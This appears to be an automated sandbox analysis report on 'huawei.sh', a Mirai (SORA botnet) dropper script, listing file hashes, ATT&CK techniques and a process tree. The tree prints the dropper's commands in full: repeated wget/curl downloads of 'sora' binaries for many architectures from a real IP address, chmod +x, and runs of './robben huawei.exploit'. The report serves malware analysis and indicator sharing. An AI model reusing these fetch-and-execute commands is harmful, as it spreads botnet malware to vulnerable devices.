mirai | d35d4010a32654d026d45c552acf8ef7bdc74ec484227b2ccc2ae08bd491fa2f

Analysis

max time kernel
16s
max time network
129s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240611-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
20-02-2025 16:17

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

huawei.sh
Size

2KB
MD5

ac306c41d87f3602aa9c98d67147f52a
SHA1

ed5f329d01c5020564e348a9b020b2d1b62ce80a
SHA256

d35d4010a32654d026d45c552acf8ef7bdc74ec484227b2ccc2ae08bd491fa2f
SHA512

3cb56411917bd35c7a32e996b376d6a2e78992c8229b6b71936e694085701f9b5b4c40ab7968ed61e49988e0b324d2d3cf8233b7ecc9e13d622cf8559d355ad1

Score

10^/10

mirai sora botnet defense_evasion discovery upx

Malware Config

Extracted

Family

mirai

Botnet

SORA

Extracted

Family

mirai

Botnet

SORA

Signatures

Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai
Mirai family
mirai

File and Directory Permissions Modification 1 TTPs 14 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
1566	chmod
1572	chmod
1578	chmod
1549	chmod
1555	chmod
1560	chmod
1584	chmod
1589	chmod
1595	chmod
1517	chmod
1523	chmod
1529	chmod
1535	chmod
1540	chmod

Executes dropped EXE 14 IoCs

ioc	pid	Process
/tmp/robben	1518	huawei.sh
/tmp/robben	1524	huawei.sh
/tmp/robben	1530	huawei.sh
/tmp/robben	1536	huawei.sh
/tmp/robben	1541	huawei.sh
/tmp/robben	1550	huawei.sh
/tmp/robben	1556	huawei.sh
/tmp/robben	1561	huawei.sh
/tmp/robben	1567	huawei.sh
/tmp/robben	1573	huawei.sh
/tmp/robben	1579	huawei.sh
/tmp/robben	1585	huawei.sh
/tmp/robben	1590	huawei.sh
/tmp/robben	1596	huawei.sh

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/fstream-1.dat	upx
behavioral1/files/fstream-4.dat	upx
behavioral1/files/fstream-5.dat	upx
behavioral1/files/fstream-7.dat	upx

System Network Configuration Discovery 1 TTPs 3 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
1520	wget
1521	curl
1522	cat

Writes file to tmp directory 26 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/sora.x86	curl
File opened for modification	/tmp/sora.mips	curl
File opened for modification	/tmp/sora.i686	curl
File opened for modification	/tmp/sora.mpsl	curl
File opened for modification	/tmp/sora.m68k	wget
File opened for modification	/tmp/sora.m68k	curl
File opened for modification	/tmp/robben	huawei.sh
File opened for modification	/tmp/sora.mpsl	wget
File opened for modification	/tmp/sora.arm7	curl
File opened for modification	/tmp/sora.ppc	curl
File opened for modification	/tmp/sora.ppc440fp	curl
File opened for modification	/tmp/sora.sh4	wget
File opened for modification	/tmp/sora.mips	wget
File opened for modification	/tmp/sora.x86_64	wget
File opened for modification	/tmp/sora.x86_64	curl
File opened for modification	/tmp/sora.i468	curl
File opened for modification	/tmp/sora.arm4	curl
File opened for modification	/tmp/sora.arm5	curl
File opened for modification	/tmp/sora.arm6	wget
File opened for modification	/tmp/sora.ppc	wget
File opened for modification	/tmp/sora.x86	wget
File opened for modification	/tmp/sora.i686	wget
File opened for modification	/tmp/sora.arm5	wget
File opened for modification	/tmp/sora.arm6	curl
File opened for modification	/tmp/sora.arm7	wget
File opened for modification	/tmp/sora.sh4	curl

/tmp/huawei.sh
/tmp/huawei.sh
1⤵
- Executes dropped EXE
- Writes file to tmp directory
PID:1510
- /usr/bin/wget
  wget http://176.65.137.13/bins/sora.x86
  2⤵
  - Writes file to tmp directory
  PID:1511
- /usr/bin/curl
  curl -O http://176.65.137.13/bins/sora.x86
  2⤵
  - Writes file to tmp directory
  PID:1515
- /bin/cat
  cat sora.x86
  2⤵
  PID:1516
- /bin/chmod
  chmod +x config-err-V8i1f1 huawei.sh netplan_1g28a08u robben snap-private-tmp sora.x86 ssh-zYBNdZVpQqvt systemd-private-db8c9e4d3e954cef901cb4690baf26be-bolt.service-xxuCDF systemd-private-db8c9e4d3e954cef901cb4690baf26be-colord.service-h3886O systemd-private-db8c9e4d3e954cef901cb4690baf26be-ModemManager.service-vaOZi0 systemd-private-db8c9e4d3e954cef901cb4690baf26be-systemd-resolved.service-xlinxd systemd-private-db8c9e4d3e954cef901cb4690baf26be-systemd-timedated.service-meMTcq
  2⤵
  - File and Directory Permissions Modification
  PID:1517
- /usr/bin/wget
  wget http://176.65.137.13/bins/sora.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1520
- /usr/bin/curl
  curl -O http://176.65.137.13/bins/sora.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1521
- /bin/cat
  cat sora.mips
  2⤵
  - System Network Configuration Discovery
  PID:1522
- /bin/chmod
  chmod +x config-err-V8i1f1 huawei.sh netplan_1g28a08u robben snap-private-tmp sora.mips sora.x86 ssh-zYBNdZVpQqvt systemd-private-db8c9e4d3e954cef901cb4690baf26be-bolt.service-xxuCDF systemd-private-db8c9e4d3e954cef901cb4690baf26be-colord.service-h3886O systemd-private-db8c9e4d3e954cef901cb4690baf26be-ModemManager.service-vaOZi0 systemd-private-db8c9e4d3e954cef901cb4690baf26be-systemd-resolved.service-xlinxd systemd-private-db8c9e4d3e954cef901cb4690baf26be-systemd-timedated.service-meMTcq
  2⤵
  - File and Directory Permissions Modification
  PID:1523
- /tmp/robben
  ./robben huawei.exploit
  2⤵
  PID:1524
- /usr/bin/wget
  wget http://176.65.137.13/bins/sora.x86_64
  2⤵
  - Writes file to tmp directory
  PID:1526
- /usr/bin/curl
  curl -O http://176.65.137.13/bins/sora.x86_64
  2⤵
  - Writes file to tmp directory
  PID:1527
- /bin/cat
  cat sora.x86_64
  2⤵
  PID:1528
- /bin/chmod
  chmod +x config-err-V8i1f1 huawei.sh netplan_1g28a08u robben snap-private-tmp sora.mips sora.x86 sora.x86_64 ssh-zYBNdZVpQqvt systemd-private-db8c9e4d3e954cef901cb4690baf26be-bolt.service-xxuCDF systemd-private-db8c9e4d3e954cef901cb4690baf26be-colord.service-h3886O systemd-private-db8c9e4d3e954cef901cb4690baf26be-ModemManager.service-vaOZi0 systemd-private-db8c9e4d3e954cef901cb4690baf26be-systemd-resolved.service-xlinxd systemd-private-db8c9e4d3e954cef901cb4690baf26be-systemd-timedated.service-meMTcq
  2⤵
  - File and Directory Permissions Modification
  PID:1529
- /tmp/robben
  ./robben huawei.exploit
  2⤵
  PID:1530
- /usr/bin/wget
  wget http://176.65.137.13/bins/sora.i468
  2⤵
  PID:1532
- /usr/bin/curl
  curl -O http://176.65.137.13/bins/sora.i468
  2⤵
  - Writes file to tmp directory
  PID:1533
- /bin/cat
  cat sora.i468
  2⤵
  PID:1534
- /bin/chmod
  chmod +x config-err-V8i1f1 huawei.sh netplan_1g28a08u robben snap-private-tmp sora.i468 sora.mips sora.x86 sora.x86_64 ssh-zYBNdZVpQqvt systemd-private-db8c9e4d3e954cef901cb4690baf26be-bolt.service-xxuCDF systemd-private-db8c9e4d3e954cef901cb4690baf26be-colord.service-h3886O systemd-private-db8c9e4d3e954cef901cb4690baf26be-ModemManager.service-vaOZi0 systemd-private-db8c9e4d3e954cef901cb4690baf26be-systemd-resolved.service-xlinxd systemd-private-db8c9e4d3e954cef901cb4690baf26be-systemd-timedated.service-meMTcq
  2⤵
  - File and Directory Permissions Modification
  PID:1535
- /tmp/robben
  ./robben huawei.exploit
  2⤵
  PID:1536
- /usr/bin/wget
  wget http://176.65.137.13/bins/sora.i686
  2⤵
  - Writes file to tmp directory
  PID:1537
- /usr/bin/curl
  curl -O http://176.65.137.13/bins/sora.i686
  2⤵
  - Writes file to tmp directory
  PID:1538
- /bin/cat
  cat sora.i686
  2⤵
  PID:1539
- /bin/chmod
  chmod +x config-err-V8i1f1 huawei.sh netplan_1g28a08u robben snap-private-tmp sora.i468 sora.i686 sora.mips sora.x86 sora.x86_64 ssh-zYBNdZVpQqvt systemd-private-db8c9e4d3e954cef901cb4690baf26be-bolt.service-xxuCDF systemd-private-db8c9e4d3e954cef901cb4690baf26be-colord.service-h3886O systemd-private-db8c9e4d3e954cef901cb4690baf26be-ModemManager.service-vaOZi0 systemd-private-db8c9e4d3e954cef901cb4690baf26be-systemd-resolved.service-xlinxd systemd-private-db8c9e4d3e954cef901cb4690baf26be-systemd-timedated.service-meMTcq
  2⤵
  - File and Directory Permissions Modification
  PID:1540
- /usr/bin/wget
  wget http://176.65.137.13/bins/sora.mpsl
  2⤵
  - Writes file to tmp directory
  PID:1543
- /usr/bin/curl
  curl -O http://176.65.137.13/bins/sora.mpsl
  2⤵
  - Writes file to tmp directory
  PID:1544
- /bin/cat
  cat sora.mpsl
  2⤵
  PID:1548
- /bin/chmod
  chmod +x config-err-V8i1f1 huawei.sh netplan_1g28a08u robben snap-private-tmp sora.i468 sora.i686 sora.mips sora.mpsl sora.x86 sora.x86_64 ssh-zYBNdZVpQqvt systemd-private-db8c9e4d3e954cef901cb4690baf26be-bolt.service-xxuCDF systemd-private-db8c9e4d3e954cef901cb4690baf26be-colord.service-h3886O systemd-private-db8c9e4d3e954cef901cb4690baf26be-ModemManager.service-vaOZi0 systemd-private-db8c9e4d3e954cef901cb4690baf26be-systemd-resolved.service-xlinxd systemd-private-db8c9e4d3e954cef901cb4690baf26be-systemd-timedated.service-meMTcq
  2⤵
  - File and Directory Permissions Modification
  PID:1549
- /tmp/robben
  ./robben huawei.exploit
  2⤵
  PID:1550
- /usr/bin/wget
  wget http://176.65.137.13/bins/sora.arm4
  2⤵
  PID:1552
- /usr/bin/curl
  curl -O http://176.65.137.13/bins/sora.arm4
  2⤵
  - Writes file to tmp directory
  PID:1553
- /bin/cat
  cat sora.arm4
  2⤵
  PID:1554
- /bin/chmod
  chmod +x config-err-V8i1f1 huawei.sh netplan_1g28a08u robben snap-private-tmp sora.arm4 sora.i468 sora.i686 sora.mips sora.mpsl sora.x86 sora.x86_64 ssh-zYBNdZVpQqvt systemd-private-db8c9e4d3e954cef901cb4690baf26be-bolt.service-xxuCDF systemd-private-db8c9e4d3e954cef901cb4690baf26be-colord.service-h3886O systemd-private-db8c9e4d3e954cef901cb4690baf26be-ModemManager.service-vaOZi0 systemd-private-db8c9e4d3e954cef901cb4690baf26be-systemd-resolved.service-xlinxd systemd-private-db8c9e4d3e954cef901cb4690baf26be-systemd-timedated.service-meMTcq
  2⤵
  - File and Directory Permissions Modification
  PID:1555
- /tmp/robben
  ./robben huawei.exploit
  2⤵
  PID:1556
- /usr/bin/wget
  wget http://176.65.137.13/bins/sora.arm5
  2⤵
  - Writes file to tmp directory
  PID:1557
- /usr/bin/curl
  curl -O http://176.65.137.13/bins/sora.arm5
  2⤵
  - Writes file to tmp directory
  PID:1558
- /bin/cat
  cat sora.arm5
  2⤵
  PID:1559
- /bin/chmod
  chmod +x config-err-V8i1f1 huawei.sh netplan_1g28a08u robben snap-private-tmp sora.arm4 sora.arm5 sora.i468 sora.i686 sora.mips sora.mpsl sora.x86 sora.x86_64 ssh-zYBNdZVpQqvt systemd-private-db8c9e4d3e954cef901cb4690baf26be-bolt.service-xxuCDF systemd-private-db8c9e4d3e954cef901cb4690baf26be-colord.service-h3886O systemd-private-db8c9e4d3e954cef901cb4690baf26be-ModemManager.service-vaOZi0 systemd-private-db8c9e4d3e954cef901cb4690baf26be-systemd-resolved.service-xlinxd systemd-private-db8c9e4d3e954cef901cb4690baf26be-systemd-timedated.service-meMTcq
  2⤵
  - File and Directory Permissions Modification
  PID:1560
- /tmp/robben
  ./robben huawei.exploit
  2⤵
  PID:1561
- /usr/bin/wget
  wget http://176.65.137.13/bins/sora.arm6
  2⤵
  - Writes file to tmp directory
  PID:1563
- /usr/bin/curl
  curl -O http://176.65.137.13/bins/sora.arm6
  2⤵
  - Writes file to tmp directory
  PID:1564
- /bin/cat
  cat sora.arm6
  2⤵
  PID:1565
- /bin/chmod
  chmod +x config-err-V8i1f1 huawei.sh netplan_1g28a08u robben snap-private-tmp sora.arm4 sora.arm5 sora.arm6 sora.i468 sora.i686 sora.mips sora.mpsl sora.x86 sora.x86_64 ssh-zYBNdZVpQqvt systemd-private-db8c9e4d3e954cef901cb4690baf26be-bolt.service-xxuCDF systemd-private-db8c9e4d3e954cef901cb4690baf26be-colord.service-h3886O systemd-private-db8c9e4d3e954cef901cb4690baf26be-ModemManager.service-vaOZi0 systemd-private-db8c9e4d3e954cef901cb4690baf26be-systemd-resolved.service-xlinxd systemd-private-db8c9e4d3e954cef901cb4690baf26be-systemd-timedated.service-meMTcq
  2⤵
  - File and Directory Permissions Modification
  PID:1566
- /tmp/robben
  ./robben huawei.exploit
  2⤵
  PID:1567
- /usr/bin/wget
  wget http://176.65.137.13/bins/sora.arm7
  2⤵
  - Writes file to tmp directory
  PID:1569
- /usr/bin/curl
  curl -O http://176.65.137.13/bins/sora.arm7
  2⤵
  - Writes file to tmp directory
  PID:1570
- /bin/cat
  cat sora.arm7
  2⤵
  PID:1571
- /bin/chmod
  chmod +x config-err-V8i1f1 huawei.sh netplan_1g28a08u robben snap-private-tmp sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.i468 sora.i686 sora.mips sora.mpsl sora.x86 sora.x86_64 ssh-zYBNdZVpQqvt systemd-private-db8c9e4d3e954cef901cb4690baf26be-bolt.service-xxuCDF systemd-private-db8c9e4d3e954cef901cb4690baf26be-colord.service-h3886O systemd-private-db8c9e4d3e954cef901cb4690baf26be-ModemManager.service-vaOZi0 systemd-private-db8c9e4d3e954cef901cb4690baf26be-systemd-resolved.service-xlinxd systemd-private-db8c9e4d3e954cef901cb4690baf26be-systemd-timedated.service-meMTcq
  2⤵
  - File and Directory Permissions Modification
  PID:1572
- /tmp/robben
  ./robben huawei.exploit
  2⤵
  PID:1573
- /usr/bin/wget
  wget http://176.65.137.13/bins/sora.ppc
  2⤵
  - Writes file to tmp directory
  PID:1575
- /usr/bin/curl
  curl -O http://176.65.137.13/bins/sora.ppc
  2⤵
  - Writes file to tmp directory
  PID:1576
- /bin/cat
  cat sora.ppc
  2⤵
  PID:1577
- /bin/chmod
  chmod +x config-err-V8i1f1 huawei.sh netplan_1g28a08u robben snap-private-tmp sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.i468 sora.i686 sora.mips sora.mpsl sora.ppc sora.x86 sora.x86_64 ssh-zYBNdZVpQqvt systemd-private-db8c9e4d3e954cef901cb4690baf26be-bolt.service-xxuCDF systemd-private-db8c9e4d3e954cef901cb4690baf26be-colord.service-h3886O systemd-private-db8c9e4d3e954cef901cb4690baf26be-ModemManager.service-vaOZi0 systemd-private-db8c9e4d3e954cef901cb4690baf26be-systemd-resolved.service-xlinxd systemd-private-db8c9e4d3e954cef901cb4690baf26be-systemd-timedated.service-meMTcq
  2⤵
  - File and Directory Permissions Modification
  PID:1578
- /tmp/robben
  ./robben huawei.exploit
  2⤵
  PID:1579
- /usr/bin/wget
  wget http://176.65.137.13/bins/sora.ppc440fp
  2⤵
  PID:1581
- /usr/bin/curl
  curl -O http://176.65.137.13/bins/sora.ppc440fp
  2⤵
  - Writes file to tmp directory
  PID:1582
- /bin/cat
  cat sora.ppc440fp
  2⤵
  PID:1583
- /bin/chmod
  chmod +x config-err-V8i1f1 huawei.sh netplan_1g28a08u robben snap-private-tmp sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.i468 sora.i686 sora.mips sora.mpsl sora.ppc sora.ppc440fp sora.x86 sora.x86_64 ssh-zYBNdZVpQqvt systemd-private-db8c9e4d3e954cef901cb4690baf26be-bolt.service-xxuCDF systemd-private-db8c9e4d3e954cef901cb4690baf26be-colord.service-h3886O systemd-private-db8c9e4d3e954cef901cb4690baf26be-ModemManager.service-vaOZi0 systemd-private-db8c9e4d3e954cef901cb4690baf26be-systemd-resolved.service-xlinxd systemd-private-db8c9e4d3e954cef901cb4690baf26be-systemd-timedated.service-meMTcq
  2⤵
  - File and Directory Permissions Modification
  PID:1584
- /tmp/robben
  ./robben huawei.exploit
  2⤵
  PID:1585
- /usr/bin/wget
  wget http://176.65.137.13/bins/sora.m68k
  2⤵
  - Writes file to tmp directory
  PID:1586
- /usr/bin/curl
  curl -O http://176.65.137.13/bins/sora.m68k
  2⤵
  - Writes file to tmp directory
  PID:1587
- /bin/cat
  cat sora.m68k
  2⤵
  PID:1588
- /bin/chmod
  chmod +x config-err-V8i1f1 huawei.sh netplan_1g28a08u robben snap-private-tmp sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.i468 sora.i686 sora.m68k sora.mips sora.mpsl sora.ppc sora.ppc440fp sora.x86 sora.x86_64 ssh-zYBNdZVpQqvt systemd-private-db8c9e4d3e954cef901cb4690baf26be-bolt.service-xxuCDF systemd-private-db8c9e4d3e954cef901cb4690baf26be-colord.service-h3886O systemd-private-db8c9e4d3e954cef901cb4690baf26be-ModemManager.service-vaOZi0 systemd-private-db8c9e4d3e954cef901cb4690baf26be-systemd-resolved.service-xlinxd systemd-private-db8c9e4d3e954cef901cb4690baf26be-systemd-timedated.service-meMTcq
  2⤵
  - File and Directory Permissions Modification
  PID:1589
- /tmp/robben
  ./robben huawei.exploit
  2⤵
  PID:1590
- /usr/bin/wget
  wget http://176.65.137.13/bins/sora.sh4
  2⤵
  - Writes file to tmp directory
  PID:1592
- /usr/bin/curl
  curl -O http://176.65.137.13/bins/sora.sh4
  2⤵
  - Writes file to tmp directory
  PID:1593
- /bin/cat
  cat sora.sh4
  2⤵
  PID:1594
- /bin/chmod
  chmod +x config-err-V8i1f1 huawei.sh netplan_1g28a08u robben snap-private-tmp sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.i468 sora.i686 sora.m68k sora.mips sora.mpsl sora.ppc sora.ppc440fp sora.sh4 sora.x86 sora.x86_64 ssh-zYBNdZVpQqvt systemd-private-db8c9e4d3e954cef901cb4690baf26be-bolt.service-xxuCDF systemd-private-db8c9e4d3e954cef901cb4690baf26be-colord.service-h3886O systemd-private-db8c9e4d3e954cef901cb4690baf26be-ModemManager.service-vaOZi0 systemd-private-db8c9e4d3e954cef901cb4690baf26be-systemd-resolved.service-xlinxd systemd-private-db8c9e4d3e954cef901cb4690baf26be-systemd-timedated.service-meMTcq
  2⤵
  - File and Directory Permissions Modification
  PID:1595
- /tmp/robben
  ./robben huawei.exploit
  2⤵
  PID:1596

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/robben

Filesize
28KB

MD5
fa9b6c7c37b9749884b432b1cfcd447c

SHA1
1ddf712db6bf2948950b7fd884766a1a5d2b4294

SHA256
4a18c7f6e74bc6f4a20f948c8b0555f4688c80740a5eb9d3388fc8930ac65432

SHA512
2f8f653f60de4a0562e524fb9993175a46b946e1fe476f3e180558baa0462f5725549c6587ad1b264df98cee8438adfab8bab7014ef423ff7a554ee59e9ef806

Download Submit
/tmp/robben

Filesize
28KB

MD5
ce88468dfdee071a7a62485b512c56a1

SHA1
8a1c6f3d1024b98faba6b58072972e72936add17

SHA256
9a720166ffa4e73959c5cb54af0b5637ad17cb1ac768f7a66939a07e9f0e28db

SHA512
91eb34165af402c57d25c7c958605e03f680f271187174a0ab2e891c0c31322808e484a1c98b4bd6c924d68493b9d99f36474e45c4b29b5959530f79382c3d8c

Download Submit
/tmp/robben

Filesize
212B

MD5
83ab6cd9a67528bbc6f4f360cb7f8d83

SHA1
07e8f17209e0569aab39f062568ff0090d9b20d4

SHA256
3ffdc3e7f17876fa23ee6595712e544975dc985d313fe07fd103e6cd3606b435

SHA512
171e8022f004540814acfc611cd0c46f708fdc6dd2590042981cb00f8136baa6521155549a77e98352901b0dfa5a8d284feb37a7babf9e2bf400a9acc3bb686f

Download Submit
/tmp/robben

Filesize
28KB

MD5
a70636d57e9deea3ce72e6e0212965f0

SHA1
4761f53ca4d1ba6f193adbb9c460acc6c8b14d38

SHA256
86103ccdb8e57a2c6a9be1828561fbf4f07adc21e432f8e21ebcc10eebb0281c

SHA512
e9b69afa60a19d13f7780428eea5b071328301282b3f589787078d45a6b79f53d9b8c8ae39a611564fa62b726c987851a6f1a2ef45e633039a53f9c07de6357b

Download Submit
/tmp/robben

Filesize
64KB

MD5
4047f835c9e2afbc9ee9dea5d14587fe

SHA1
c2d7f812ddede398f1a8c875152d0f262743a70e

SHA256
1bfe680601595f54ba0232409784e9b939729fb44871606010cb704daef1dba0

SHA512
41ddc457d226b269f6da6dff30c97cd44a2aa542b19f020039733dee3c9512ad31d1cffa5877e494055bde9e554c108f8828fea86a7c0f6663592506e337d787

Download Submit
/tmp/sora.x86

Filesize
27KB

MD5
c0c367bd815a1550281a34845445dcb3

SHA1
cdaeafd335143dd8c3584c0ba8362c6281b38786

SHA256
438747b91b304a609ccd2b5a7502fea1e20b6beabdb035834f335825b182644e

SHA512
60adf781185e829c222bd0570193cfa157bf622323404bb629692a9b18da9e73c8d59fd2305c96172f374fdab20dceadae45ac4137d6ae6e3fc6861ae8a24ead

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads